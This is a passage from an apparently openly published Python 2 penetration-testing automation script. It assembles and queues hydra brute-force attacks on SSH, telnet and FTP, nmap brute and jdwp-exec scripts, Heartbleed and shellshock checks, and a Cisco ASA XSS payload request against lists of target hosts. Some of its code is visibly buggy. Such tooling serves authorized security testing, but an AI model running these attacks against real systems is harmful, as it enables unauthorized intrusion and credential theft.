os.path.exists(logFilename): 1187 | with open(logFilename) as f: 1188 | lines = f.read().splitlines() 1189 | if hostNo not in lines: 1190 | print "- Checking for ASA XSS: "+str(hostNo) 1191 | if checkForASA(hostNo)==True: 1192 | c = httplib.HTTPSConnection(hostNo) 1193 | c.request("GET", "/+CSCOE+/logon.html?reason=2&auth_handle=\"%20style%3dbehavior%3aurl('%23default%23time2')%20onbegin%3d'alert(String.fromCharCode(88,83,83))'") 1194 | response = c.getresponse() 1195 | if response.status==200: 1196 | data = response.read() 1197 | if "alert(String.fromCharCode(88,83,83))" in data: 1198 | resultListASAXSS.append(hostNo) 1199 | filename = open(logFilename,"a+") 1200 | filename.write(hostNo+"\n") 1201 | filename.close() 1202 | 1203 | 1204 | if taskToRun=="whatweb" or taskToRun=="all" or taskToRun=="http": 1205 | logFilename = origPath+"/runWhatWeb.log" 1206 | if not os.path.exists(logFilename): 1207 | fullCmd="ruby "+toolsPath+"/WhatWeb/whatweb -a 3 "+hostNo+":"+portNo+" 2>&1 >> "+logFilename 1208 | if quiet==False: 1209 | print fullCmd 1210 | cmdList.append(["whatweb",hostNo,fullCmd]) 1211 | 1212 | if taskToRun=="shellshock" or taskToRun=="all" or taskToRun=="http": 1213 | logFilename = origPath+"/runShellshock_https_"+hostNo+"_"+portNo+".log" 1214 | if not os.path.exists(logFilename): 1215 | fullCmd = "python2.7 "+shellShockPath+"shocker.py --Hostname "+hostNo+" --ssl --cgilist "+shellShockPath+"/shocker-cgi_list --port "+portNo+" | tee -a "+logFilename 1216 | #fullCmd = "python2.7 "+shellShockPath+"shellshock_scanner.py "+origPath+"/portHTTPs.txt "+shellShockPath+"cgi_list_example.txt -e 2 -w "+origPath+"/resultsHTTP.csv --proto https -t 10" 1217 | if quiet==False: 1218 | print fullCmd 1219 | cmdList.append(["shellshock",hostNo,fullCmd]) 1220 | 1221 | #if taskToRun=="clusterd" or taskToRun=="all" or taskToRun=="http": 1222 | # logFilename = origPath+"/runClusterd_https_"+hostNo+"_"+portNo+".log" 1223 | # if not os.path.exists(logFilename): 1224 | # fullCmd = "cd 
"+clusterdPath+" && sudo python "+clusterdPath+"clusterd.py -i "+hostNo+" -p "+portNo+" --ssl | tee -a "+logFilename 1225 | # #fullCmd = "cd "+clusterdPath+" && sudo python "+clusterdPath+"clusterd.py -i "+hostNo+" -p "+portNo+" --ssl 2>&1 >> "+origPath+"/runClusterd_https_"+hostNo+"_"+portNo+".log" 1226 | # if quiet==False: 1227 | # print fullCmd 1228 | # cmdList.append(["clusterd",hostNo,fullCmd]) 1229 | 1230 | if taskToRun=="yasuo" or taskToRun=="all" or taskToRun=="http": 1231 | logFilename = origPath+"/runYasuo_https_"+hostNo+"_"+portNo+".log" 1232 | if not os.path.exists(logFilename): 1233 | fullCmd = "cd "+yasuoPath+" && sudo ruby yasuo.rb -r "+hostNo+" -p "+portNo+" -b all | sudo tee -a "+logFilename 1234 | if quiet==False: 1235 | print fullCmd 1236 | cmdList.append(["yasuo",hostNo,fullCmd]) 1237 | 1238 | if (taskToRun=="tilde" or taskToRun=="all"): 1239 | filename = origPath+"/portTilde.txt" 1240 | tildeList=[] 1241 | if os.path.exists(filename): 1242 | with open(filename) as f: 1243 | for line in f: 1244 | tildeList.append(line.strip()) 1245 | for host in tildeList: 1246 | 1247 | hostNo = host.split(":")[1].replace("//","").strip() 1248 | portNo = host.split(":")[2].strip() 1249 | logFilename = origPath+"/runTilde_"+hostNo+"_"+portNo.replace('//','')+".log" 1250 | if not os.path.exists(logFilename): 1251 | fullCmd = "cd "+tildePath+" && echo -ne '\n\n' | java -jar "+tildePath+"IIS_shortname_scanner.jar 0 20 "+host+" 2>&1 >> "+logFilename 1252 | if quiet==False: 1253 | print fullCmd 1254 | cmdList.append(["tilde",hostNo,fullCmd]) 1255 | 1256 | if (taskToRun=="ssh" or taskToRun=="all"): 1257 | if not os.path.exists(toolsPath+"/wordList_ssh_hydra.txt"): 1258 | print toolsPath+"wordList_ssh_hydra.txt does not exists." 
1259 | print "wget https://raw.githubusercontent.com/milo2012/pentest_scripts/master/default_accounts_wordlist/wordList_ssh_hydra.txt -O "+toolsPath+"wordList_ssh_hydra.txt" 1260 | sys.exit() 1261 | filename = origPath+"/portSSH.txt" 1262 | sshList=[] 1263 | if os.path.exists(filename): 1264 | with open(filename) as f: 1265 | for line in f: 1266 | sshList.append(line) 1267 | for host in sshList: 1268 | hostList = host.split(":") 1269 | hostNo = hostList[0].strip() 1270 | portNo = hostList[1].strip() 1271 | 1272 | logFilename = origPath+"/runHydraSSH_"+hostNo+"_"+portNo+".log" 1273 | if not os.path.exists(logFilename): 1274 | fullCmd="hydra -s "+portNo+" -S -f -V -C "+toolsPath+"/wordList_ssh_hydra.txt "+hostNo+" ssh | tee -a "+logFilename 1275 | #fullCmd="medusa -M ssh -C "+toolsPath+"/wordList_ssh.txt -T4 -t4 -f -F -h "+hostNo+" -n "+portNo+" -O "+logFilename 1276 | if quiet==False: 1277 | print fullCmd 1278 | cmdList.append(["ssh",hostNo,fullCmd]) 1279 | 1280 | if taskToRun=="telnet" or taskToRun=="all": 1281 | if not os.path.exists(toolsPath+"/wordList_telnet.txt"): 1282 | print toolsPath+"wordList_telnet.txt does not exists" 1283 | print "wget https://raw.githubusercontent.com/milo2012/pentest_scripts/master/default_accounts_wordlist/wordList_telnet.txt -O "+toolsPath+"wordList_telnet.txt" 1284 | sys.exit() 1285 | filename = origPath+"/portTelnet.txt" 1286 | telnetList=[] 1287 | if os.path.exists(filename): 1288 | with open(filename) as f: 1289 | for line in f: 1290 | telnetList.append(line) 1291 | for host in telnetList: 1292 | hostList = host.split(":") 1293 | hostNo = hostList[0].strip() 1294 | portNo = hostList[1].strip() 1295 | 1296 | logFilename=origPath+"/runHydraTelnet_"+hostNo+"_"+portNo+".log" 1297 | if not os.path.exists(logFilename): 1298 | fullCmd="hydra -s "+portNo+" -f -V -C "+toolsPath+"/wordList_ssh_hydra.txt "+hostNo+" telnet | tee -a "+logFilename 1299 | #fullCmd="medusa -M telnet -C "+toolsPath+"/wordList_telnet.txt -T4 -t4 -f -F -h 
"+hostNo+" -n "+portNo+" 2>&1 >> "+logFilename 1300 | if quiet==False: 1301 | print fullCmd 1302 | cmdList.append(["telnet",hostNo,fullCmd]) 1303 | 1304 | if taskToRun=="xmpp" or taskToRun=="all" or taskToRun=="5222": 1305 | filename = origPath+"/port5222.txt" 1306 | xmppList=[] 1307 | if os.path.exists(filename): 1308 | with open(filename) as f: 1309 | for line in f: 1310 | xmppList.append(line.strip()) 1311 | for host in xmppList: 1312 | hostNo = host 1313 | logFilename = origPath+"/runXmpp_http_"+hostNo+"_"+portNo+".log" 1314 | if not os.path.exists(logFilename): 1315 | fullCmd="nmap -p 5222 --script xmpp-brute "+hostNo+" | tee -a "+logFilename 1316 | if quiet==False: 1317 | print fullCmd 1318 | cmdList.append(["xmpp",hostNo,fullCmd]) 1319 | 1320 | if taskToRun=="ftp" or taskToRun=="all": 1321 | filename = origPath+"/portFTP.txt" 1322 | ftpList=[] 1323 | if os.path.exists(filename): 1324 | with open(filename) as f: 1325 | for line in f: 1326 | ftpList.append(line) 1327 | for host in ftpList: 1328 | hostList = host.split(":") 1329 | hostNo = hostList[0].strip() 1330 | portNo = hostList[1].strip() 1331 | 1332 | logFilename=origPath+"/runHydraFTP_"+hostNo+"_"+portNo+".log" 1333 | if not os.path.exists(logFilename): 1334 | fullCmd="hydra -s "+portNo+" -f -V -C "+toolsPath+"/wordList_ssh_hydra.txt "+hostNo+" ftp | tee -a "+logFilename 1335 | #fullCmd="medusa -M ftp -C "+toolsPath+"/wordList_telnet.txt -T4 -t4 -f -F -h "+hostNo+" -n "+portNo+" 2>&1 >> "+origPath+"/runMedusaFTP.log" 1336 | if quiet==False: 1337 | print fullCmd 1338 | cmdList.append(["ftp",hostNo,fullCmd]) 1339 | 1340 | if taskToRun=="ssl" or taskToRun=="all" or taskToRun=="tlssled" or taskToRun=="sslcert" or taskToRun=="sslknownkey" or taskToRun=="sslccs" or taskToRun=="heartbleed": 1341 | filename = origPath+"/portSSL.txt" 1342 | sslList=[] 1343 | if os.path.exists(filename): 1344 | with open(filename) as f: 1345 | for line in f: 1346 | sslList.append(line) 1347 | for host in sslList: 1348 | hostList 
= host.split(":") 1349 | hostNo = hostList[0].strip() 1350 | portNo = hostList[1].strip() 1351 | 1352 | if taskToRun=="sslcert" or taskToRun=="ssl" or taskToRun=="all": 1353 | logFilename = origPath+"/runSSLCert_"+hostNo+"_"+portNo+".log" 1354 | if not os.path.exists(logFilename): 1355 | fullCmd = "nmap -Pn --script=ssl-cert -p "+portNo+" "+hostNo+" | tee -a "+logFilename 1356 | if quiet==False: 1357 | print fullCmd 1358 | 1359 | cmdList.append(["sslcert",hostNo,fullCmd]) 1360 | 1361 | if taskToRun=="sslknownkey" or taskToRun=="ssl" or taskToRun=="all": 1362 | logFilename = origPath+"/runSSLKnownKey_"+hostNo+"_"+portNo+".log" 1363 | if not os.path.exists(logFilename): 1364 | fullCmd = "nmap -Pn --script ssl-known-key "+hostNo+" -p "+portNo +" | tee -a "+logFilename 1365 | if quiet==False: 1366 | print fullCmd 1367 | cmdList.append(["sslknownkey",hostNo,fullCmd]) 1368 | 1369 | if taskToRun=="sslccs" or taskToRun=="ssl" or taskToRun=="all": 1370 | logFilename = origPath+"/runSSLCCS_"+hostNo+"_"+portNo+".log" 1371 | if not os.path.exists(logFilename): 1372 | fullCmd = "python "+toolsPath+"/OSSL_CCS_InjectTest.py "+hostNo+" "+portNo+" | tee -a "+logFilename 1373 | if quiet==False: 1374 | print fullCmd 1375 | cmdList.append(["sslccs",hostNo,fullCmd]) 1376 | 1377 | if taskToRun=="heartbleed" or taskToRun=="ssl" or taskToRun=="all": 1378 | logFilename = origPath+"/runSSLHeartbleed_"+hostNo+"_"+portNo+".log" 1379 | if not os.path.exists(logFilename): 1380 | fullCmd = "python "+toolsPath+"/heartbleed-poc/heartbleed-poc.py -n 1 -p "+portNo+" "+hostNo+" | tee -a "+logFilename 1381 | #fullCmd = "nmap -Pn -p "+portNo+" --script ssl-heartbleed "+hostNo+" | tee -a "+logFilename 1382 | 1383 | if quiet==False: 1384 | print fullCmd 1385 | cmdList.append(["heartbleed",hostNo,fullCmd]) 1386 | 1387 | if taskToRun=="tlssled" or taskToRun=="ssl" or taskToRun=="all": 1388 | logFilename = origPath+"/runSSLTlssled_"+hostNo+"_"+portNo+".log" 1389 | if not os.path.exists(logFilename): 1390 | 
fullCmd = tlssledPath+"TLSSLed_v1.3.sh "+hostNo+" "+portNo+" | tee -a "+logFilename 1391 | if quiet==False: 1392 | print fullCmd 1393 | cmdList.append(["tlssled",hostNo,fullCmd]) 1394 | 1395 | ''' 1396 | if taskToRun=="screenshot" or taskToRun=="all" or taskToRun=="peepingtom": 1397 | if not os.path.exists(origPath+"/screenshots"): 1398 | for filename in glob.glob(origPath+"/portHTTP.txt"): 1399 | fullCmd = "cd /tmp1/tools/peepingtom && python "+toolsPath+"/peepingtom/peepingtom.py -v -l "+filename 1400 | if quiet==False: 1401 | print fullCmd 1402 | cmdList.append(["screenshot",hostNo,fullCmd]) 1403 | for filename in glob.glob(origPath+"/portHTTPs.txt"): 1404 | fullCmd = "cd /tmp1/tools/peepingtom && python "+toolsPath+"/peepingtom/peepingtom.py -v -l "+filename 1405 | if quiet==False: 1406 | print fullCmd 1407 | cmdList.append(["screenshot",hostNo,fullCmd]) 1408 | ''' 1409 | if taskToRun=="161" or taskToRun=="snmp" or taskToRun=="all": 1410 | filename = origPath+"/port161.txt" 1411 | p161List=[] 1412 | if os.path.exists(filename): 1413 | with open(filename) as f: 1414 | for line in f: 1415 | p161List.append(line) 1416 | for host in p161List: 1417 | host = host.strip() 1418 | logFilename = origPath+"/runSNMP_"+host+".log" 1419 | if not os.path.exists(logFilename): 1420 | fullCmd = "sudo nmap -sU -p 161 -Pn --script snmp-brute --script-args snmp-brute.communitiesdb="+toolsPath+"/wordlist-common-snmp-community-strings.txt "+host+" | tee -a runSNMP_"+host+".log" 1421 | #fullCmd = "sudo nmap -sU -p 161 --script snmp-brute --script-args -Pn snmp-brute.communitiesdb="+toolsPath+"/wordlist-common-snmp-community-strings.txt -iL "+filename+" | tee -a "+logFilename 1422 | if quiet==False: 1423 | print fullCmd 1424 | cmdList.append(["161",hostNo,fullCmd]) 1425 | 1426 | if taskToRun=="123" or taskToRun=="ntp" or taskToRun=="all": 1427 | filename = origPath+"/port123.txt" 1428 | if os.path.exists(filename): 1429 | logFilename = origPath+"/runNTP.log" 1430 | if not 
os.path.exists(logFilename): 1431 | #fullCmd="nmap -sU -pU:123 -Pn -n --script=ntp-monlist -iL "+origPath+"/port123.txt" 1432 | fullCmd="sudo nmap -sU -pU:123 -Pn -n --script=ntp-monlist -iL "+origPath+"/port123.txt | tee -a "+logFilename 1433 | if quiet==False: 1434 | print fullCmd 1435 | cmdList.append(["123",hostNo,fullCmd]) 1436 | 1437 | if taskToRun=="1098" or taskToRun=="all": 1438 | filename = origPath+"/port1098.txt" 1439 | p1098List=[] 1440 | if os.path.exists(filename): 1441 | with open(filename) as f: 1442 | for line in f: 1443 | p1098List.append(line) 1444 | logFilename=origPath+"/runPort1098.log" 1445 | if not os.path.exists(logFilename): 1446 | for host in p1098List: 1447 | host = host.strip() 1448 | 1449 | #fullCmd = 'nmap --script "rmi-dumpregistry.nse" -p 1098 -iL '+origPath+"/port1098.txt" 1450 | fullCmd = 'nmap --script "rmi-dumpregistry.nse" -p 1098 -iL '+origPath+"/port1098.txt | tee -a "+logFilename 1451 | if quiet==False: 1452 | print fullCmd 1453 | cmdList.append(["1098",hostNo,fullCmd]) 1454 | 1455 | if taskToRun=="3306" or taskToRun=="all": 1456 | filename = origPath+"/port3306.txt" 1457 | p3306List=[] 1458 | if os.path.exists(filename): 1459 | with open(filename) as f: 1460 | for line in f: 1461 | p3306List.append(line) 1462 | #cmdList = [] 1463 | logFilename=origPath+"/runPort3306.log" 1464 | if not os.path.exists(logFilename): 1465 | for host in p3306List: 1466 | host = host.strip() 1467 | 1468 | fullCmd = "nmap -sV --script=mysql-empty-password -p 3306 "+host[0]+" | tee -a "+logFilename 1469 | cmdList.append(["3306".fullCmd]) 1470 | fullCmd = "nmap --script=mysql-brute -p 3306 "+host[0] 1471 | cmdList.append(["3306",hostNo,fullCmd]) 1472 | 1473 | 1474 | if taskToRun=="6379" or taskToRun=="all": 1475 | filename = origPath+"/port6379.txt" 1476 | p6379List=[] 1477 | if os.path.exists(filename): 1478 | with open(filename) as f: 1479 | for line in f: 1480 | p6379List.append(line) 1481 | fullCmd = [] 1482 | 
logFilename=origPath+"/runPort6379.log" 1483 | if not os.path.exists(logFilename): 1484 | for host in p6379List: 1485 | host = host.strip() 1486 | 1487 | fullCmd = "nmap -p 6379 --script redis-brute "+host[0]+" | tee -a "+logFilename 1488 | cmdList.append(["6379",hostNo,fullCmd]) 1489 | fullCmd = "nmap -p 6379 --script redis-info "+host[0]+" | tee -a "+logFilename 1490 | cmdList.append(["6379",hostNo,fullCmd]) 1491 | 1492 | 1493 | if taskToRun=="1099" or taskToRun=="all": 1494 | filename = origPath+"/port1099.txt" 1495 | p1099List=[] 1496 | if os.path.exists(filename): 1497 | with open(filename) as f: 1498 | for line in f: 1499 | p1099List.append(line) 1500 | logFilename=origPath+"/runPort1099.log" 1501 | if not os.path.exists(logFilename): 1502 | for host in p1099List: 1503 | host = host.strip() 1504 | 1505 | #fullCmd = "nmap --script=rmi-vuln-classloader -p 1099 "+host[0] 1506 | fullCmd = "nmap --script=rmi-vuln-classloader -p 1099 "+host[0]+" 2>&1 >> "+logFilename 1507 | if quiet==False: 1508 | print fullCmd 1509 | cmdList.append(["1099",hostNo,fullCmd]) 1510 | 1511 | if taskToRun=="5432" or taskToRun=="all": 1512 | filename = origPath+"/port5432.txt" 1513 | p5432List=[] 1514 | if os.path.exists(filename): 1515 | with open(filename) as f: 1516 | for line in f: 1517 | p5432List.append(line) 1518 | logFilename=origPath+"/runPort5432.log" 1519 | if not os.path.exists(logFilename): 1520 | for host in p5432List: 1521 | host = host.strip() 1522 | 1523 | #fullCmd = "nmap -p 5432 --script pgsql-brute -iL "+origPath+"/port5432.txt" 1524 | fullCmd = "nmap -p 5432 --script pgsql-brute -iL "+origPath+"/port5432.txt 2>&1 >> "+logFilename 1525 | if quiet==False: 1526 | print fullCmd 1527 | cmdList.append(["1099",hostNo,fullCmd]) 1528 | 1529 | if taskToRun=="2010" or taskToRun=="all": 1530 | filename = origPath+"/port2010.txt" 1531 | p2010List=[] 1532 | if os.path.exists(filename): 1533 | with open(filename) as f: 1534 | for line in f: 1535 | p2010List.append(line) 1536 | 
logFilename=origPath+"/runPort2010.log" 1537 | if not os.path.exists(logFilename): 1538 | for host in p2010List: 1539 | host = host.strip() 1540 | 1541 | #fullCmd = 'nmap -sT -p 2010 --script=+jdwp-exec --script-args cmd="date" '+host[0] 1542 | fullCmd = 'nmap -sT -p 2010 --script=+jdwp-exec --script-args cmd="date" '+host[0]+' 2>&1 >> '+origPath+"/runPort2010.log" 1543 | if quiet==False: 1544 | print fullCmd 1545 | cmdList.append(["2010",hostNo,fullCmd]) 1546 | 1547 | if taskToRun=="27017" or taskToRun=="all": 1548 | filename = origPath+"/port27017.txt" 1549 | p25017List=[] 1550 | if os.path.exists(filename): 1551 | with open(filename) as f: 1552 | for line in f: 1553 | p25017List.append(line) 1554 | logFilename=origPath+"/runPort27017.log" 1555 | if not os.path.exists(logFilename): 1556 | for host in p25017List: 1557 | host = host.strip() 1558 | 1559 | fullCmd = "nmap -p 27017 --script mongodb-brute "+host[0]+" 2>&1 >> "+logFilename 1560 | if quiet==False: 1561 | print fullCmd 1562 | cmdList.append(["27017",hostNo,fullCmd]) 1563 | 1564 | if taskToRun=="512" or taskToRun=="all": 1565 | filename = origPath+"/port512.txt" 1566 | p512List=[] 1567 | if os.path.exists(filename): 1568 | with open(filename) as f: 1569 | for line in f: 1570 | p512List.append(line) 1571 | logFilename=origPath+"/runPort512.log" 1572 | if not os.path.exists(logFilename): 1573 | for host in p512List: 1574 | host = host.strip() 1575 | 1576 | fullCmd = "nmap -p 512 --script rexec-brute "+host[0] 1577 | if quiet==False: 1578 | print fullCmd 1579 | cmdList.append(["512",hostNo,fullCmd]) 1580 | 1581 | if taskToRun=="5060" or taskToRun=="all": 1582 | filename = origPath+"/port5060.txt" 1583 | p5060List=[] 1584 | if os.path.exists(filename): 1585 | with open(filename) as f: 1586 | for line in f: 1587 | p5060List.append(line) 1588 | logFilename=origPath+"/runPort5060.log" 1589 | if not os.path.exists(logFilename): 1590 | for host in p5060List: 1591 | host = host.strip() 1592 | 1593 | fullCmd = "nmap 
-sU -p 5060 --script=sip-brute -iL "+origPath+"/port5060.txt 2>&1 >> "+logFilename 1594 | if quiet==False: 1595 | print fullCmd 1596 | cmdList.append(["5060",hostNo,fullCmd]) 1597 | 1598 | if taskToRun=="500" or taskToRun=="vpn" or taskToRun=="all": 1599 | filename = origPath+"/port500.txt" 1600 | if os.path.exists(filename): 1601 | p500List=[] 1602 | with open(filename) as f: 1603 | for line in f: 1604 | p500List.append(line.strip()) 1605 | #cmdList = [] 1606 | for host in p500List: 1607 | host = host.strip() 1608 | 1609 | logFilename = origPath+"/runPort500_ikescan_"+host+".log" 1610 | if not os.path.exists(logFilename): 1611 | if not os.path.exists(logFilename): 1612 | #fullCmd = "sudo ike-scan "+host 1613 | fullCmd = "sudo ike-scan "+host+" 2>&1 >> "+logFilename 1614 | cmdList.append(["500",hostNo,fullCmd]) 1615 | #fullCmd = "sudo python "+vpnPath+"ikeforce.py "+host+" -e -s 1 -w "+vpnPath+"wordlists/groupnames.dic" 1616 | #cmdList.append(fullCmd) 1617 | logFilename = origPath+"/runPort500_ikeversion_"+host+".log" 1618 | if not os.path.exists(logFilename): 1619 | if not os.path.exists(logFilename): 1620 | #fullCmd = "sudo ike-scan "+host 1621 | fullCmd = "sudo nmap -Pn -sU -p 500 --script ike-version "+host+" 2>&1 >> "+logFilename 1622 | cmdList.append(["500",hostNo,fullCmd]) 1623 | #fullCmd = "sudo python "+vpnPath+"ikeforce.py "+host+" -e -s 1 -w "+vpnPath+"wordlists/groupnames.dic" 1624 | #cmdList.append(fullCmd) 1625 | 1626 | 1627 | if taskToRun=="5900" or taskToRun=="all": 1628 | filename = origPath+"/port5900.txt" 1629 | p5900List=[] 1630 | if os.path.exists(filename): 1631 | with open(filename) as f: 1632 | for line in f: 1633 | p5900List.append(line) 1634 | logFilename=origPath+"/runPort5900.log" 1635 | if not os.path.exists(logFilename): 1636 | for host in p5900List: 1637 | host = host.strip() 1638 | #fullCmd = "nmap --script vnc-brute -p 5900 "+host 1639 | fullCmd = "nmap --script vnc-brute -p 5900 "+host+" 2>&1 >> "+logFilename 1640 | if 
quiet==False: 1641 | print fullCmd 1642 | cmdList.append(["5900",hostNo,fullCmd]) 1643 | 1644 | if taskToRun=="25" or taskToRun=="all": 1645 | filename = origPath+"/port25.txt" 1646 | p25List=[] 1647 | if os.path.exists(filename): 1648 | with open(filename) as f: 1649 | for line in f: 1650 | p25List.append(line) 1651 | #cmdList=[] 1652 | logFilename=origPath+"/runPort25.log" 1653 | if not os.path.exists(logFilename): 1654 | for host in smtpList: 1655 | host = host.strip() 1656 | fullCmd = "nmap -p 25 --script smtp-brute "+host 1657 | cmdList.append(["25",hostNo,fullCmd]) 1658 | fullCmd = "nmap --script=smtp-vuln-cve2010-4344 --script-args='smtp-vuln-cve2010-4344.exploit' -pT:25,465,587 "+host+" 2>&1 >> "+logFilename 1659 | cmdList.append(["25",hostNo,fullCmd]) 1660 | fullCmd = "nmap --script=smtp-vuln-cve2011-1764 -pT:25,465,587 "+host+" 2>&1 >> "+logFilename 1661 | cmdList.append(["25",hostNo,fullCmd]) 1662 | 1663 | 1664 | if taskToRun=="139" or taskToRun=="all": 1665 | filename = origPath+"/port139.txt" 1666 | p139List=[] 1667 | if os.path.exists(filename): 1668 | with open(filename) as f: 1669 | for line in f: 1670 | p139List.append(line) 1671 | logFilename=origPath+"/runPort139.log" 1672 | if not os.path.exists(logFilename): 1673 | for host in p139List: 1674 | host = host.strip() 1675 | fullCmd = "nmap --script=samba-vuln-cve-2012-1182 -p 139 "+host+" 2>&1 >> "+logFilename 1676 | if quiet==False: 1677 | print fullCmd 1678 | cmdList.append(["139",hostNo,fullCmd]) 1679 | 1680 | if taskToRun=="512" or taskToRun=="all": 1681 | filename = origPath+"/port512.txt" 1682 | if os.path.exists(filename): 1683 | logFilename=origPath+"/runPort512.log" 1684 | if not os.path.exists(logFilename): 1685 | fullCmd = "nmap -p 512 --script rexec-brute "+host+" -iL "+filename 1686 | #fullCmd = "nmap -p 512 --script rexec-brute "+host+" -iL "+filename+" 2>&1 >> "+logFilename 1687 | if quiet==False: 1688 | print fullCmd 1689 | cmdList.append(["512",hostNo,fullCmd]) 1690 | 1691 | if 
taskToRun=="513" or taskToRun=="all": 1692 | filename = origPath+"/port513.txt" 1693 | if os.path.exists(filename): 1694 | logFilename=origPath+"/runPort513.log" 1695 | if not os.path.exists(logFilename): 1696 | fullCmd = "nmap -p 513 --script rlogin-brute -iL "+filename+" 2>&1 >> "+logFilename 1697 | if quiet==False: 1698 | print fullCmd 1699 | cmdList.append(["513",hostNo,fullCmd]) 1700 | 1701 | if taskToRun=="554" or taskToRun=="all": 1702 | filename = origPath+"/port554.txt" 1703 | if os.path.exists(filename): 1704 | logFilename=origPath+"/runPort554.log" 1705 | if not os.path.exists(logFilename): 1706 | #cmdList=[] 1707 | fullCmd = "nmap -p 554 --script rtsp-methods -iL "+filename+" 2>&1 >> "+logFilename 1708 | cmdList.append(fullCmd) 1709 | fullCmd = "nmap --script rtsp-url-brute -p 554 -iL "+filename+" 2>&1 >> "+logFilename 1710 | cmdList.append(["554",hostNo,fullCmd]) 1711 | 1712 | if taskToRun=="902" or taskToRun=="all": 1713 | filename = origPath+"/port902.txt" 1714 | if os.path.exists(filename): 1715 | logFilename=origPath+"/runPort902.log" 1716 | if not os.path.exists(logFilename): 1717 | fullCmd = "nmap -p 902 --script vmauthd-brute -iL "+filename+" 2>&1 >> "+logFilename 1718 | if quiet==False: 1719 | print fullCmd 1720 | cmdList.append(["902",hostNo,fullCmd]) 1721 | 1722 | if taskToRun=="2002" or taskToRun=="all": 1723 | filename = origPath+"/port2002.txt" 1724 | if os.path.exists(filename): 1725 | #cmdList = [] 1726 | logFilename=origPath+"/runPort2002.log" 1727 | if not os.path.exists(logFilename): 1728 | for host in p2002ListList: 1729 | host = host.strip() 1730 | 1731 | fullCmd = "nmap -p 2002 --script rpcap-brute -iL "+filename+" 2>&1 >> "+logFilename 1732 | cmdList.append(["2002",hostNo,fullCmd]) 1733 | fullCmd = "nmap -p 2002 --script rpcap-info -iL "+filename+" 2>&1 >> "+logFilename 1734 | cmdList.append(["2002",hostNo,fullCmd]) 1735 | 1736 | 1737 | if taskToRun=="2401" or taskToRun=="all": 1738 | filename = origPath+"/port2401.txt" 1739 | 
p2401List=[] 1740 | if os.path.exists(filename): 1741 | with open(filename) as f: 1742 | for line in f: 1743 | p2401List.append(line) 1744 | #cmdList = [] 1745 | logFilename=origPath+"/runPort2401.log" 1746 | if not os.path.exists(logFilename): 1747 | for host in p2401List: 1748 | host = host.strip() 1749 | 1750 | fullCmd = "nmap -p 2401 --script cvs-brute "+host+" 2>&1 >> "+logFilename 1751 | cmdList.append(["2401",hostNo,fullCmd]) 1752 | fullCmd = "nmap -p 2401 --script cvs-brute-repository "+host+" 2>&1 >> "+logFilename 1753 | cmdList.append(["2401",hostNo,fullCmd]) 1754 | 1755 | if taskToRun=="8098" or taskToRun=="all": 1756 | filename = origPath+"/port8098.txt" 1757 | p8098List=[] 1758 | if os.path.exists(filename): 1759 | with open(filename) as f: 1760 | for line in f: 1761 | p8098List.append(line) 1762 | 1763 | logFilename=origPath+"/runPort8098.log" 1764 | if not os.path.exists(logFilename): 1765 | for host in p8098List: 1766 | host = host.strip() 1767 | 1768 | fullCmd = "nmap -p 8098 --script riak-http-info "+host+" 2>&1 >> "+logFilename 1769 | if quiet==False: 1770 | print fullCmd 1771 | cmdList.append(["8098",hostNo,fullCmd]) 1772 | 1773 | if taskToRun=="9160" or taskToRun=="all": 1774 | filename = origPath+"/port9160.txt" 1775 | if os.path.exists(filename): 1776 | logFilename=origPath+"/runPort9160.log" 1777 | if not os.path.exists(logFilename): 1778 | for host in p9160List: 1779 | host = host.strip() 1780 | 1781 | fullCmd = "nmap -p 9160 --script=cassandra-brute "+host+" 2>&1 >> "+logFilename 1782 | if quiet==False: 1783 | print fullCmd 1784 | cmdList.append(["9160",hostNo,fullCmd]) 1785 | 1786 | if taskToRun=="873" or taskToRun=="all": 1787 | filename = origPath+"/port873.txt" 1788 | p873List=[] 1789 | if os.path.exists(filename): 1790 | with open(filename) as f: 1791 | for line in f: 1792 | p873List.append(line) 1793 | #cmdList = [] 1794 | logFilename=origPath+"/runPort873.log" 1795 | if not os.path.exists(logFilename): 1796 | for host in p873List: 
1797 | host = host.strip() 1798 | 1799 | fullCmd = "nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' "+host+" 2>&1 >> "+logFilename 1800 | cmdList.append(["873",hostNo,fullCmd]) 1801 | fullCmd = "nmap -p 873 --script rsync-list-modules "+host+" 2>&1 >> "+logFilename 1802 | cmdList.append(["873",hostNo,fullCmd]) 1803 | 1804 | 1805 | if taskToRun=="1080" or taskToRun=="all": 1806 | filename = origPath+"/port1080.txt" 1807 | p1080List=[] 1808 | if os.path.exists(filename): 1809 | with open(filename) as f: 1810 | for line in f: 1811 | p1080List.append(line) 1812 | #cmdList = [] 1813 | logFilename=origPath+"/runPort1080.log" 1814 | if not os.path.exists(logFilename): 1815 | for host in p1080List: 1816 | host = host.strip() 1817 | 1818 | fullCmd = "nmap -p 1080 --script socks-auth-info "+host+" 2>&1 >> "+logFilename 1819 | cmdList.append(["1080",hostNo,fullCmd]) 1820 | fullCmd = "nmap --script socks-brute -p 1080 "+host+" 2>&1 >> "+logFilename 1821 | cmdList.append(["1080",hostNo,fullCmd]) 1822 | 1823 | if taskToRun=="1723" or taskToRun=="all": 1824 | filename = origPath+"/port1723.txt" 1825 | p1723List=[] 1826 | if os.path.exists(filename): 1827 | with open(filename) as f: 1828 | for line in f: 1829 | p1723List.append(line) 1830 | logFilename=origPath+"/runPort1723.log" 1831 | if not os.path.exists(logFilename): 1832 | for host in p1723List: 1833 | host = host.strip() 1834 | 1835 | fullCmd = "nmap -sV -p 1723 "+host+" 2>&1 >> "+logFilename 1836 | if quiet==False: 1837 | print fullCmd 1838 | cmdList.append(["1723",hostNo,fullCmd]) 1839 | 1840 | 1841 | if taskToRun=="3389" or taskToRun=="all": 1842 | filename = origPath+"/port3389.txt" 1843 | p3389List=[] 1844 | if os.path.exists(filename): 1845 | #cmdList = [] 1846 | logFilename=origPath+"/runPort3389.log" 1847 | if not os.path.exists(logFilename): 1848 | for host in p3389List: 1849 | host = host.strip() 1850 | 1851 | fullCmd = "nmap -p 3389 --script rdp-enum-encryption "+host+" 2>&1 >> 
